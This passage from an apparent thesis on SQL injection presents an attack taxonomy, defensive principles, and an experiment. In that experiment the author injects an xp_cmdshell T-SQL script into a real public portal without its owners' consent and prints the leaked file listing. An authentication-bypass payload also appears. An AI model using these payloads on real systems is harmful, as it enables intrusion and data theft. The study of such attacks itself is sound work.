file
upload
subqueries
JOIN
UNION
multiple
statements
comments
error
messages
type
casting
variable
morphism
stored
procedures
string
concatenation
INTO
weakpolicies
& Principles
unvalidated
input
error msg
feedback
time
delays
uncontrolled
var size
type casting
& morphism
single
quotes
discovering
DB objects
offline
research
Web
Forms
URL
Header
HTTP
Header Cookie
Poisoning
AAcccceessss CCoonnttrrooll,, AAvvaaiillaabbiilliittyy,, AAuutthheennttiicciittyy,,
CCoonnffiiddeennttiiaalliittyy,, PPrriivvaaccyy,, SSeeccrreeccyy,, IInntteeggrriittyy,,
AAuuddiittaabbiilliittyy
DDeessiiggnn tthhee ffiinnaall qquueerryy ffoorr ppeerrppeettrraattiinngg
tthhee aattttaacckk

attack taxonomy •
TOWARD THE TAXONOMY
The following table presents a more verbose reading of the taxonomy:
# Name Description
1 Setting the Objective
First step of the attack lifecycle. The attacker implicitly
or explicitly determines which security services will be
compromised.
Services under threat:
Access Control, Availability, Authenticity,
Confidentiality, Privacy, Secrecy, Integrity, Auditability
2 Choosing the Method
Once the collection of objectives is established and
the list of security services formulated, the attacker
must then choose the collection of methods that will
serve to address the objectives previously set-out
2.1 Data Manipulation
Deals with the possibility to retrieve, change, fabricate
or delete data in a database through the use SQL
commands and can potentially extend to the full DML
(Data Manipulation Language) stack
2.2 Authentication Bypass
An attacker may use this method to pretend to be a
legitimate user by bypassing an authorization
mechanism and be granted authentication privileges.
2.3 Information Retrieval
Attackers can try to manipulate or execute SELECT
statements and similar in order to get access to
information beyond their privileges.
2.4 Information Manipulation
Attackers can try to manipulate or execute UPDATE
statements and similar in order to alter information
beyond their privileges.
2.5 Information Fabrication
Attackers can try to manipulate or execute INSERT
statements and similar in order to alter information
beyond their privileges.
2.6 Information Deletion
Attackers can try to manipulate or execute DELETE or
DROP statements and similar in order to alter
information beyond their privileges

attack taxonomy •
TOWARD THE TAXONOMY
# Name Description
2.7 Extending to Other Data Sources
Through the use of distributed queries, the attacker
can extend the attack to virtually any OldDb/ODBC
compliant data source.
2.8 Extending to the Operating System
Command execution is a method that enables an
attacker to execute SQL specific system commands
through the RDBMS and may even allow the attacker
to take control over other host computers in the
network
2.9 Uploading Files
Once an attacker has gained adequate privileges on
the SQL Server, he may desire to upload files to the
server, e. g. an executable file, in order to execute
complex operations at the operating system level as
well as at the network environment level.
3 Examining Prerequisites
Different SQL Injection attack methods have different
prerequisites in order to be carried-out. These can be
related to query execution properties, or specific
features embedded on the RDBMS, or even the
topology of the surrounding corporate network
environment.
3.1 Subqueries
Sub-querying enables nesting of SQL statements.
Subqueries are achieved at the expense of sub-selects
which are nothing more than multiple SELECT
statements used together. It can potentially offer the
means to piggy-back a malicious query.
3.2 JOIN
The JOIN clause enables to combine information from
multiple tables, including tables from external data
sources, and yield a consolidated resultset. JOINs can
provide the means to access unintended information
sources and combine them on a single resultset.
JOINs can provide the means to access unintended
information sources and combine them on a single
resultset.
3.3 UNION
The UNION logical operator can be used to combine
multiple resultsets from multiple SELECT queries into
a single consolidated resultset.

attack taxonomy •
TOWARD THE TAXONOMY
# Name Description
3.4 Multiple Statements
Refers to the ability of allowing the execution of
multiple SQL statements, where each statement is
separated by a delimiter, e.g. a semicolon or the GO
separator.
3.5 Comments
The ability to comment out parts of an SQL
statement, meaning that the RDBMS will not take
notice of the SQL syntax followed by a comment
symbol, will provide for syntax consistency after the
carrier query has been injected.
3.6 Error Messages
Error messages can provide invaluable information
about a system’s inner structures and information if
an injection attack is having progress, especially if
error messages are propagated all the way to the
frontend. These can be raised by the RDBMS or in any
server side script or program, or even by the injection
itself as a means for outputting information.
3.7 Implicit Type Casting
Implicit type casting can happen at the RDBMS level
as well at the business layer level. Implicit conversions
are those conversions that occur without specifying
either the CAST or CONVERT function. Explicit
conversions are those conversions that require the
CAST or CONVERT function to be specified. An
attacker could use type casting to his advantage and
fool the application and the underlying RDBMS.
3.8 Variable Morphism
Variable morphism is closely related to implicit type
casting. Whereas in implicit casting a variable’s type
remains unaltered as it is strong typed, when
variables allow morphism, instead of casting the value
to the variable’s type, the type of the variable changes
to accommodate the type of the value.
3.9 Stored Procedures
Supported by all commercial RDBMSs, they allow the
execution of system or database commands and SQL
subroutines in the RDBMS. The potential of these
procedures is directly connected to the functions they
can perform.

attack taxonomy •
TOWARD THE TAXONOMY
# Name Description
3.10
String Concatenation for Building
Dynamic Statements
If developers use a string concatenation approach in
order to build dynamic statements, there is a pretty
good chance the attacker can manipulate it to his
advantage, whereas using a parameterized approach
makes things a whole lot more difficult.
3.11 INTO
The INTO clause can be used to redirect query
yieldings to different sources other than the regular
query output stream. If used with the OUTFILE
instruction, it is possible to output contents to a file.
3.12 Weak Policies and Principles
Principles and policies play an important role in
defending against SQL Injection attacks, e.g. the least
privilege principle, as they can determine the success
or failure of many exploitation attempts.
4 Poking for Vulnerablities
Assessing which vulnerabilities are present will serve
to steer the attack in terms of determining if the
prerequisites for specific attack methods are met,
which in turn will relate back to the attack objectives
previously formulated.
4.1 Unvalidated Input
Is in essence what makes SQL Injection possible.
Unchecked parameters to SQL queries that are
dynamically built can be used in SQL Injection attacks.
4.2 Error Message Feedback
Error messages that are generated by the RDBMS or
by other server-side component may be bubbled-up
to client-side. While these messages can be useful
during development for debugging purposes, they
can also constitute risks to the application since
attackers may use them to obtain information about
database or script structure in order to construct their
attack. Injecting an expression to cause a syntax error
is the most commonly used means for assessing it.
4.3 Time Delays
If runtime error messages are concealed from the
end-user, the attacker must have some kind of
positive feedback whenever he is poking around for
vulnerabilities. Forcing a delayed response will
implicitly indicate a successfully injection attack.

attack taxonomy •
TOWARD THE TAXONOMY
# Name Description
4.4 Type Casting & Variable Morphism
Entrypoints that deal with numeric values are a good
place to start assessing the application’s proneness to
implicit type casting and variable morphis since it is
possible to exploit a query simply by using basic
arithmetic operations.
4.5
Single Quotation Marks in Building
Dynamic Queries
If the application or one of its stored procedures uses
string concatenation for constructing dynamic SQL
statements, then there is a pretty good chance single
quotation marks on the carrier query can be
manipulated in order to piggy-back a second
statement.
4.6 Discovering Database Objects
The database structure is kept hidden. Uncovering the
inner structure of the RDBMS will require the use of
DML statements and the DDL stack as well.
Discovering the database structure is therefore the
last step of poking for vulnerabilities as it will need to
combine several of the atomic vulnerabilities and
methods previously assessed.
4.7 Offline Research
Many Web and regular applications are not
developed in house but are software packages more
or less distributed across the globe. An attacker could
build a similar lab environment at home and in the
comfort of his home, he could take as much time as
he wanted to study and prepare the attack without
taking any risks.
5 Choosing Means
Once the attacks objectives are set out, tools ready,
prerequisites met, and weak spots targeted, the
attacker must choose the means to deliver the
attack’s payload via some kind of frontend
entrypoint.
5.1 Web Form Manipulation
An attacker can use forms, the typical frontend of a
tiered application, to enter parts of SQL statements
such as SQL keywords, control characters or data in
order to manipulate underlying application server-side
scripts or programs.

attack taxonomy •
TOWARD THE TAXONOMY
# Name Description
5.2 URL Header Manipulation
Similar to Web form manipulation, only that the
form’s contents are sent via a human-readable
querystring as part of the Web resource URL.
5.3 HTTP Header Manipulation
Whenever an HTTP request or response is issued,
there is a set of headers enveloping the request. If by
any chance any HTTP header is used in the
construction of a dynamic SQL statement, then there
is a chance to manipulate the headers in order to
perform a SQL Injection attack.
5.4 Cookie Poisoning
Cookies are text files stored by the browser on the
user’s hard disk on behalf of the Web application. It is
very common to authenticate users using cookies.
Because their role it to primarily hold user-specific
data with direct consequences on the contents to be
rendered, it is almost 100% guaranteed information
stored in cookies will participate in the formulation of
dynamically generated SQL statements.
6 Designing the Query
Designing the query is the final step on the chain of
iterative steps. By the time the final query is to be
designed, the hacker has a clear idea of the objective
he wishes to accomplish, he has researched and
assessed several attack methods that can be of some
use, ascertained which prerequisites are present,
tested for weaknesses, and chose the delivery method
for the attack. It is now time to design a query that
needs to follow the proper structure of an SQL query
expected by the RDBMS, while accounting for all the
constraints imposed by the environment.
Table 5 - Taxonomy of SQL Injection Attacks

Chapter 5
EXPERIMENTING
Experimentation is a classic form of research that owes much to
the Natural Sciences, although it features strongly in social
science research, particularly psychology. Experimentation
is all about cause-effect and is the pinnacle of positivistic
research. In positivistic research, also known as the
Scientific Method, a model for describing the problem is
formulated and its variables isolated through environment
control, e. g. samples.
The purpose of this chapter is to build internal validity by experimenting against a
real test subject on a production environment. Experimenting will be conducted
using the proposed taxonomy has basis for perpetrating the attack by iteratively
following the steps described on the attack lifecycle.

experimenting •
REAL ENVIRONMENT TEST
Probably the best way to clarify the research topic even more and validate both the
taxonomy and the survey of existing techniques is to step-down from conceptuality and
move-on to a real working example. For this matter a simple Web application published
on the Internet was chosen during casual Web surfing where no particular elective
method was used apart from the fact it was very easy to determine the application’s
proneness to SQL Injection. The following page which URL will not be revealed for ethical
reasons was accessed on April 2006 and is a portal intended for scholars looking for
research fellowships and grants in various scientific fields.
Figure 32 - Public Page Used for Proof of Concept

experimenting •
Experimenting
One simple and quick way to determine if a page is prone to SQL Injection is to type in
something that would deliberately result in a syntax error in the hopes some error
message is displayed. Hackers know error messages can be quite handy and a prolific
source of invaluable information. Single quotation marks are an excellent choice to start
with. The following line was typed in the free text search field:
Figure 33 - Probing for Possible Injection Entrypoints Via a Web Page
For the injection to succeed it must make a round-trip to the middle-tier which is exactly
what happens once the search button is pressed, resulting in the following output:
Figure 34 - Error Message Raised by a Successful SQL Injection Attack

experimenting •
The error message indicates the injection was successful and that it caused a syntax error.
Moreover, the amount of additional information gathered by the error message is huge.
Merely by reading it, it is possible to determine the RDBMS used by the application which
in this case is Microsoft SQL Server. This information can be applied to narrow the scope
of the attacks and exploit the particularities of that RDBMS, as for example, directing the
SQL language used in the attacks to the SQL dialect of that particular system in order to
augment the options available. Furthermore, the error message states that the middle-tier
components are accessing the database via an abstraction layer called ODBC, thus
providing the hacker with additional data that could be used to exploit known
vulnerabilities of the ODBC provider for Microsoft SQL Server. It even informs which line
of which Web resource raised the error. Not bad for one not so trivial search keyword!
But things could get worse! Using DML commands it would be a very simple task to alter
the database contents, or retrieve them without the limitations imposed by the business
rules of the application. But things could really get a whole lot worse! What if the attack
uses the database security context to gain access to the server’s operating system and
resources? And from there interact with other corporate systems such as legacy systems?
In this proof of concept nothing so grave will be performed as only the list of files in the
root folder of the C drive will be retrieved using the following T-SQL script:

experimenting •
Experimenting
Since it was possible to determine that the database management system is Microsoft
SQL Server thanks to a very enlightening error message, a whole new set of options is
now available. This statement applies to any RDBMS as long the attacker knows which
goodies that particular RDBMS makes available. In this case, the above script takes
advantage of a MS SQL Server stored procedure to execute operating system commands.
Since the Web application herein used displays unhandled error messages, the script
takes advantage of that fact and raises as error containing the desired information.
Conveniently, the Web application will then render the error message as part of the
output. The only challenge remaining is to inject this script into the Web application’s
middle-tier without breaking the resulting query syntax. However this step requires some
imagination as some guessing of the backend query structure is required. Let’s make an
educated guess and assume the backend query is similar to this:
CREATE TABLE #temp(x varchar(255))
Insert Into #temp
Exec Master..xp_cmdshell 'Dir C:'
Declare @line as varchar(255)
Declare @ErrorLine as varchar(5000)
Set @ErrorLine=''
Declare FileList Cursor FAST_FORWARD For
Select * from #temp where substring(x,3,1)='-'
Open FileList
Fetch Next From FileList into @line
While @@Fetch_Status = 0
Begin
Set @line = ltrim(substring(@line,18,255))
If substring(@line,1,5)='<DIR>'
Set @line = 'D>' + ltrim(substring(@line,6,255))
Else
Set @line = substring(@line, CharIndex(' ',@line) + 1, 255)
Set @ErrorLine = @ErrorLine + @line + ','
Fetch Next From FileList into @line
End
Close FileList
Deallocate FileList
Drop Table #temp
RaisError (@ErrorLine,16,1)

experimenting •
So the script will be placed within the WHERE clause of the query. Therefore if the
following value were input into the search textbox the query structure and syntax would
remain unaltered:
The semi-colon enables executing several queries in a single SQL statement, whereas the
double hyphen indicates that everything after it is a comment and therefore should be
ignored. So the input value on the page would look like what is displayed in red where
“TheScript” should be interpreted as the above-mentioned script. Because the field
length of the page does not permit so many characters one final step is still required. The
HTML page must be saved locally and edited, let’s say using Notepad, and the field
length augmented in order to accommodate the script’s length. Once the local version of
the page is filled-in with the script and posted back to the Web server, here is the result:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]
1.asp,D>AS2000SP4,blah.cz,D>CA_LIC,D>compaq,D>CPQSYSTEM,
D>DBASQL,DIY_TEMPCOMMAND.log,D>Documents and Settings,down.vbs,
D>ePOAgent,Hacked.txt,instalacao_fct.bak,D>lic98_win_eng_1-61-12,
net_sql.txt,odbcconf.log,PAX,D>PerfLogs,D>Program Files,D>QUARANTINE,
setup.log,siweb_cmd.log,D>TEMP,website.mdf,website_20040414,
WEBSITE_db_200511091200.BAK,D>WINNT,D>WUTemp,~,
/cache/cache.area=6&object=9.asp, line 379
Figure 35 - List of Local Files Obtained via an Error Raised by a Successful SQL Injection Attack
Select * From someTable Where contents like '%';TheScript;--%'
Select * From someTable Where contents like '%userInput%'

experimenting •
Experimenting
The list of files was displayed as part of a database error and embedded in the output
page produced by the middle-tier components. This simple attack was successfully
perpetrated without the use of any tools and 28 lines of code was all it took to gain
access to the operating system of a server sitting on the most well protected network
zone (see Figure 6 - Typical Web Infrastructure Layout on page 34) and avoid all network
security devices in place with no plausible trace activity left behind. The damage inflicted
could easily be extended simply by manipulating the operating system shell command on
the script. Creating new users, accessing classified data, and getting into other corporate
systems is only a few extra lines of code away. The examples herein demonstrated only
touch the tip of the iceberg, and even though they could be avoided with little effort
from the development teams, however, this can only be accomplished if developers and
solution architects are aware of this threat and understand the impact of their actions.

Chapter 6
DEFENSIVE TACTICS
Security is all about managing risks, and some risks never go
away completely. Whereas some high-profile risks such as
buffer overflows have pretty straightforward solutions,
the easiest classes of attacks to implement – particularly
social engineering and insider attacks – do not. Though
SQL Injection is amongst these classes there is a lot that
can still be done.
On this chapter some of the most sounding countermeasures for SQL Injection
attacks are described. Yet, any existing security principle could potentially
contribute to safeguarding against these attacks. For that matter, this chapter
opts for a more cause-effect approach and promotes those strategies that offer a
pragmatic view for preventing or minimizing SQL Injection attacks.

defensive tactics •
TECHNOLOGY-BASED
Security is all about managing risks, and some risks never go away completely. Whereas
some high-profile risks such as buffer overflows have pretty straightforward solutions, the
easiest classes of attacks to implement – particularly social engineering and insider attacks
– do not (Howard & LeBlanc 2003). This statement can also be applied to SQL Injection
as this type of attacks is in general harder to detect and protect against (Landsmann &
Strömberg 2003;OWASP 2006;Spett 2002), not to mention its growing popularity, due
in great measure to the increasing growth of database-enabled Web applications
(Buehrer, Weide, & Sivilotti 2005).
The breadth and depth of the problem as outlined by literature portrays SQL Injection as
a big iceberg requiring a multi-disciplinary approach if a unifying solution is to be found.
Nonetheless, a lot has already been done in the field of prevention, and even though it is
not this work’s goal to approach security, some of the most sounding countermeasures
will be herein enumerated for reference.

TECHNOLOGY-BASED
DefensiveTactics
TECHNOLOGY-BASED
Huang et al. (2004) propose WebSSARI (Web application Security by Static Analysis and
Runtime Inspection) which consists on tool that performs a lattice-based static analysis of
the Web application code. Although it only supports PHP, it could be extended to
incorporate the grammar of other programming languages. Similarly, Scott and Sharp
(2002) have proposed a high-level static input validation mechanism that blocks
malicious input to Web applications. Whilst approaches based on static code analysis
offer protection through the enforcement of strictly defined policies, they fail to assess
the code itself or to identify the actual weaknesses (Huang et al. 2003). Nonetheless,
static analysis techniques, where the code is analysed at design time by a set of tools,
have been successfully attempted for ensuring security for legacy software. Huang et al.
(2003) also agree this technique can be applied to Web application code, for instance,
ASP or PHP scripts. However, it fails to adequately address the runtime behaviour of the
Web application, a direct consequence of the massive number of runtime interactions
that connect the various components. Furthermore, it is generally agreed that these
runtime interactions is what makes Web application security such a challenging task
(Huang et al. 2003;Joshi et al. 2001;Scott & Sharp 2002). In addition, the success of
static analysis techniques depend on the strictness and accuracy of the underlying
policies, which in turn cannot outsmart the inventory of pretheorized or preunderstood
points of attack – LeBlanc’s (2003) second principle on why the advantage is always on
the hacker’s side.
Aware of this limitation, Huang et al. (2003) propose a security assessment tool for Web
applications that takes into account the runtime behaviour of the application. The
biggest challenge of applying dynamic analysis to Web applications lies in providing
efficient interface mechanisms since Web applications interact with users that stand

TECHNOLOGY-BASED
behind Web browsers. They propose a black-box crawler to address the interface issue
and pinpoint all possible data entrypoints by reverse-engineering the Web application.
Then, with the help of a self-learning injection knowledge base, fault injection techniques
are applied to detect SQL Injection vulnerabilities. This approach does have merit and
provides what probably is at present days the best automated method for detecting
weaknesses. Still, it stumbles on a very harsh reality. The fact there are unlimited variations
of SQL Injection attacks (Álvarez & Petrovic 2003) indicates that the proposed “self-
learning injection knowledge base” must be really intelligent for the proposed dynamic
assessment tool to work. Unfortunately, we are still in the early days of Artificial
Intelligence.
Gaurav, Angelos, & Vassilis (2003) take a more high-level approach not centred around
SQL Injection alone as they propose a general approach for safeguarding systems against
any type of code-injection attack. They base their studies on the observation that the
specific techniques used in each attack differ – which corroborates Álvarez’s & Petrovic’s
(2003) claim of infinite variations – but at the end of the day, they all result in the attacker
executing code of his choice, whether machine code, shell commands, SQL queries, etc.
The direct implication of this observation is that the attacker knows what “type” of code
can be injected, e.g. as in the educated guesswork performed on the «Real Environment
Test» section within the Experimenting chapter. Gaurav, Angelos, & Vassilis apply
Kerckhoff’s principle, by creating process-specific randomized instruction sets (e.g.
machine instructions) of the system executing potentially vulnerable software. Since the
attacker does not know the key for the randomization algorithm, any injected code
would be alien to the code interpreter, thus causing a runtime exception. Although this
technique provides a way to completely wipe out code-injection threats, it does have four
major issues. The first is the fact it generates runtime exceptions which opens room for
an easy Denial of Service Attack (DoS), hence some strong exception handling procedures

TECHNOLOGY-BASED
DefensiveTactics
had to be put in place. The second lies on the necessity of altering the operating system’s
Kernel. If true that this could be accomplished, at least in theory, in reality the Kernel will
only be editable for open source operation systems. Furthermore, this is an extremely
delicate and complex procedure only elite sysadmins are qualified to implement. The
third issue is recognized by the authors themselves as they admit the significance of the
performance penalty. As a workaround, they proposed a modified CPU which reinforces
the not-for-common-use profile of this solution. Last, and not least, carrying out
dynamically generated code on such system without the knowledge of the
randomization key would be absolutely impossible. Therefore a thorough development
cycle with several quality control and security checkpoints would be required.
Unfortunately, as established in the introductory chapter, this is not compatible to
contemporary business demands as rapid development cycles are required in order to
face change, even though this is one of the causes for the proneness of Web applications
to SQL Injection attacks.
Barrantes, Ackley, & Forrest (2005) propose a very similar solution that basically differs on
the randomization approach. They propose a unique and private machine instruction set
for each executing program. An analogous view is also employed by Boyd & Keromytis
(2004). Their SQLrand, an instruction-set randomization for safeguarding systems against
any type of code-injection attack, only differs on the operationalization of the concept,
while the strategy remains basically the same. After careful analysis of these solutions, it
comes clear that the same issues holding back Gaurav’s, Angelos’, & Vassilis’ (2003)
solution from behind widely used can also be applied to any randomization technique.
Two very important findings have been so far established: a) static code analysis does not
introduce any performance penalty although it cannot predict runtime behaviours and
therefore fails to provide an adequate solution; b) runtime randomization is burdensome

TECHNOLOGY-BASED
on machine and people and therefore cannot be widely applied as a remedy to the
problem. However Yi & Brajendra (2004) offer an in-between solution. They propose a
data mining approach for detecting malicious transactions in a RDBMS based on the
runtime activity logs. This approach allows taking the toll out of both machine and
people while still providing for the ability to analyze the application’s runtime behaviour.
It sounds like a pretty good approach, even because RDBMS do perform extensive
logging of their activities, however, this is a post-event procedure. In other words, the
organization would be able to know exactly how, when, and where it had been attacked,
and from thereon learn, improve and possibly roll-back some actions, still, the harm
would already been done. Though Yi’s & Brajendra’s approach has academic merit, in
the everyday industry world it only serves to confirm the principle that security is by
definition reactive, whereas hacking is proactive.
As failures to provide a holistic solution to the problem accumulate, the complexity of the
attempts mounts up accordingly. Linn et al. (2004) in their paper which title testifies this
statement, «A Multi-Faceted Defence Mechanism Against Code Injection Attacks»,
propose a host-based intrusion detection system which depends on the embedding of
semantic information into executables in order to identify the locations of legitimate
system call instructions and then “back this up using a variety of techniques, including a
novel approach to encoding system call traps into the OS kernel, in order to deter
mimicry attacks”. The applicability of this technique is reduced to lab-only work. In
regards to placing semantic information into executables, such procedure requires access
to the code, which is the vast majority of cases it is not an option, and then some deep
analysis of that code in order to determine possible entrypoints. Regarding Kernel
manipulation, this procedure is not within reach of the common sysadmin and is only
applicable to open source operating systems. Finally, a “variety of techniques” does not
sound like a bullet-proof solution or something that the industry is willing to cope with.

TECHNOLOGY-BASED
DefensiveTactics
What goes up must come down. Likewise, other sources prefer to reduce the complexity
of solving the problem to as low as possible. Waymire (2004) at Microsoft Tech-Ed 2004
blames developers for the problem and states that SQL Injection is exclusively the
outcome of poor programming techniques. He also acknowledges Microsoft’s role in the
dissemination of bad programming examples and the consequent formation of a relaxed
security culture. Over the years many of the code sample contained in all sorts of official
support documentation from Microsoft were prone to SQL Injection attacks. On the
other hand, Microsoft does deserve a lot of credit for the growing awareness of the
problem and they are one of the pioneers embedding countermeasures in development
framework. They have introduced the triple-D principle: Secure by Design, Secure by
Default, and Secure in Deployment and they are taking it very seriously. If nowadays a
UNIX sysadmin installs Apache, the famous Web server, it will be up to him to know all
potential threats and perform hardening of the Web server. In contrast, Microsoft
Internet Information Server, Apache’s direct competitor, will be deployed with everything
closed, so the sysadmin is forced to use declarative security whenever a resource needs to
be used by the Web application. But there is more. SQL Injection and cross-scripting
attacks are, by default, a concern of the Microsoft ASP .NET Framework 2.0. Although it
is not bullet-proof, it does provide another layer of protection. If a remote user tries to
perform a SQL Injection attack against an application written in ASP .NET it most likely
will get an error screen as such:

TECHNOLOGY-BASED
Figure 36 - SQL Injection Attack Prevented by the Microsoft ASP .NET Framework
Security lockdown has also been applied to the RDBMS level. Microsoft SQL Server 2005
implements the “secure by default principle” so, by default, if someone tries to execute
the xp_cmdshell command or use an OPENROWSET statement, the following error
message will be thrown:
Figure 37 - Exploitation Prevented by the “Secure by Default” Principle on MS SQL Server 2005

TECHNOLOGY-BASED
DefensiveTactics
By now it is clear that SQL Injection is a lot more than a technology problem (although
there are technological countermeasures that can offer some protection), but it also
involves people, procedures and behaviours. Hence, an effective-enough countermeasure
must take into account both technical and human aspects of the problem. Typically, this
is when principles become handy tools for problem solving. Therefore this researcher
decided to stop pursuing for any fancy techie solution holding “The Answer” and took
the path that lead him to principles that could be of some use in this context.

PRINCIPLE-BASED
PRINCIPLE-BASED
Literature recurrently refers to the improvement of programming techniques as a means
to counteract the SQL Injection threat (Álvarez & Petrovic 2003;Anley 2002a;Anley
2002b;Boyd & Keromytis 2004;Cerrudo 2002;Halfond & Orso 2005a;Huang et al.
2004;Huang et al. 2003;Landsmann & Strömberg 2003;Pietraszek & Berghe 2005;Spett
2002;Waymire 2004). All too often, the attack involves escaping single quotes on a
dynamically-generated query processed at the business rules layer (Anley 2002b;Boyd &
Keromytis 2004;Cerrudo 2002;Landsmann & Strömberg 2003) as in this example:
If the remote user by means of a Web page containing a form with two fields used in the
dynamic construction of the above query inputs this expression:
Will cause the SQL statement to be execute against the RDBMS to be equal to:
The WHERE clause of this statement will always evaluate to true, regardless the values
for the login and password stored on the database, consequently allowing the attacker
to bypass the authentication mechanism implemented by the Web application. This leads
to the first and most basic principle found in the literature (Anley 2002b;Finnigan
2002;Kost 2003;Landsmann & Strömberg 2003;Maor & Shulman 2004;McDonald
2002;Sam M.S. 2005;SecuriTeam.com 2002).
Select * From Users Where Login='X' OR 'A'='A' and PWD='X' OR 'A'='A'
X' OR 'A' = 'A
Select * From Users Where Login='<user input>' and PWD='<user input>'

PRINCIPLE-BASED
DefensiveTactics
>
PRINCIPLE I
ALWAYS REPLACE SINGLE QUOTES WITH DOUBLE SINGLE QUOTES WHENEVER USER INPUT IS RECEIVED
The idea is to avoid the attacker to escape single quotes on a text-based input
value of a query. The SQL-92 standard indicates that double single quotes should
be used on a statement whenever a single quote is to be interpreted as part of a
string. So if someone wanted to insert the value LEVI’S on a database, the actual
value on the query would have to be LEVI’’S with two single quotes. In case an
attacker tries to use a value containing single quotes in the hopes of escaping the
sequence of single quotes on the base query, his attempt would be frustrated as
the injected expression would be evaluated as a mere string. This result could be
easily achieved, for example, by means of a simple VBScript replace function
similar to this:
Even though this technique offers a lot of protection against character escaping,
by itself, it is not enough for preventing code to be injected. For instance, single
quotes can be disguised in many ways, for example, using URL-encoding (%27).
In addition, there are many other techniques for concealing special characters
from being detected. This observation leads to a new idea. Wouldn’t it be nice
that instead of building a SQL statement at runtime, to have some sort of a
template query containing entrypoints for the runtime values? Such an approach
could reduce the risk of exploitation of the string concatenation procedure
necessary for producing a dynamic query. This observation leads to the second
principle.
function escape(input )
escape = replace(input, "'", "''")
end function

PRINCIPLE-BASED
>
PRINCIPLE II
PREPARED STATEMENTS OR STORED PROCEDURES CAN OFFER AN EXTRA LAYER OF PROTECTION
References in the literature regarding the benefits of prepared statements and
Stored Procedures are common (Anley 2002a;Anley 2002b;Boyd & Keromytis
2004;Cerrudo 2002;Halfond & Orso 2005a;Landsmann & Strömberg
2003;Yuhanna 2003;Yuhanna & Schwaber 2004).
The PREPARE statement feature is supported by many databases and it allows a
template SQL query to be pre-issued at the beginning of a session. For the actual
queries, only the variables that change need to be specified. Stored Procedures are
composed by a set of SQL statements that are stored under a procedure name
standing on the RDBMS so that the statements can be executed as a group by the
database server. Some RDBMSs, such as Microsoft and Sybase SQL Server,
precompile Stored Procedures so that they execute more rapidly. Although the
PREPARE feature was introduced as a performance optimization and Stored
Procedures for functional abstraction, they can address SQL Injection attacks if the
same query is issued many times (Boyd & Keromytis 2004). Let’s consider the user
authentication sample query used previously, but this time implemented using a
parameterized approach, in this example using VB.NET and ADO.NET:
myCommand.CommandText = "Select * from Users Where " & _
"Login=@Login and PWD=@PWD"
Dim Login As New SqlParameter("@Login",SqlDbType.VarChar)
Dim PWD As New SqlParameter("@PWD",SqlDbType.VarChar)
Login.Value= "<user_malicious_input>"
Password.Value= "<user_malicious_input>"
myCommand.Parameters.Add(Login)
myCommand.Parameters.Add(PWD)

PRINCIPLE-BASED
DefensiveTactics
Understanding this piece of code requires some explanation for those not
acquainted to ADO.NET. The database query is represented on what is known as a
Command object, which amongst other properties, possesses the CommandText
property used for specifying the query statement. In this case, the query is not a
dynamically generated query, but a static query with dynamic parameters. The
user input for Login and Password are now represented as input parameters
named @Login and @Password14
. The runtime values, whatever they are, will be
thereof inserted and treated as parameters of the base static query. If a user tries
to inject some malicious input, it will be virtually (if not completely) impossible to
escape the base query and inject additional statements.
It seems that this principle completely solves the problem, yet, the same sources
that speak about the benefits of Prepared Statements and Stored Procedures also
indicate that many developers and sysadmins may have a false sense of security
because they trust Stored Procedures make them invulnerable to SQL Injection
attacks. Reality is a bit harsher as one can use Stored Procedures and still be prone
to an injection attack. At the end of the day, it always depends on how the actual
implementation works. For example, the 'sp_msdropretry' system Stored
Procedure, which is accessible to the Public database role by default, allows SQL
Injection. Its inner implementation is as follows:
14
The @VarName syntax employed in this example is from the Transact-SQL dialect used by MS SQL Server in
order to reference variables as part of a statement.

PRINCIPLE-BASED
Because the queries on the Stored Procedure use concatenation, the EXEC
statement could be exploited into executing other procedures. Any stored
procedure that uses the EXEC statement to execute a query string containing
user-supplied data should be carefully audited for SQL Injection (Anley 2002a).
In summary, PREPARED statements do provide an effective defence if, and only if,
all user input is treated as parameters. On the other hand, this defence
mechanism can be laid to ground if the base query references Stored Procedures
that use string concatenation for implementing dynamic queries, instead of using
a parameterized approach as well. Any query string that is composed on-the-fly is
potentially vulnerable to SQL Injection (Anley 2002a).
>
PRINCIPLE III
ALL INPUT IS EVIL! ALWAYS EVALUATE ALL INPUT BEARING SQL INJECTION IN MIND
According to Anley (2002a) «ADODB.Command object (or similar) to access
parameterised stored procedures appears to be immune to SQL Injection. That
does not mean that no one will be able to come up with a way of injecting SQL
into an application coded this way. It is extremely dangerous to place your faith in
a single defence; best practice is therefore to always validate all input with SQL
Injection in mind». This makes absolute sense as it is safe to say that most security
CREATE PROCEDURE sp_MSdropretry (@tname sysname, @pname
sysname)
as
declare @retcode int
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)
GO

PRINCIPLE-BASED
DefensiveTactics
exploits are only possible due to lack of proper input validation from the target
application (Boyd & Keromytis 2004;Howard & LeBlanc 2003;Huang et al. 2003).
Bearing this in mind, Howard & LeBlanc (2003) propose an interesting rule of
thumb. They say that «data must be validated as it crosses the boundary between
untrusted and trusted environments».
Figure 38 - The Concept of a Trust Boundary and Chokepoints
> adapted from (Howard & LeBlanc 2003)<
This rule implies the definition of a boundary and what data is in and out of that
scope. According to the author, trusted data is data that we, or an entity we
explicitly trust, has complete control over, hence, untrusted data refers to
everything else, as for example, user input. Another corollary of this statement is
that the data that services the application stands within the trusted zone
boundary, partially explaining why SQL Injection can be so pernicious. On the
other hand, this trust can only be exploited by external data sources standing out
Trust Boundary
Chokepoint
Chokepoint
Chokepoint
Service
Environment
Variable
Config
Data
Service
Data
trust each
other

PRINCIPLE-BASED
of the boundary. Howard & LeBlanc (2003) also propose a strategy for defending
against input attacks. If exploitation can only come from external data sources
such as user input, then chokepoints at the trust border crossing could minimize
the chances for exploitation while providing for better control of the runtime
interactions. Using a multi-channel approach, where each type of external source
is forced to use its own inbound chokepoint, will reduce the risk of a cascade
attack and build functionality on top of tested and proven exchange mechanisms.
>
PRINCIPLE IV
THE LEAST-PRIVILEGE PRINCIPLE
This principle has been mentioned before as it is almost impossible to even
mention security in Information Systems without ever mentioning to this principle.
Jerry H. Saltzer & Mike D. Schroeder (1975) were the first to systemize this idea
that first arose during the 70’s by stating that «every program and every user of
the system should operate using the least set of privileges necessary to complete
the job». The underlying idea is to grant just the minimum possible privileges to
permit a legitimate action, in order to enhance protection of data and
functionality from faults (fault tolerance) and malicious behaviour. It sounds
simple, but it carries in itself a whole lot of different subjects. For instance, it
implies the existence of Access Control15
, which in turn implies the existence of
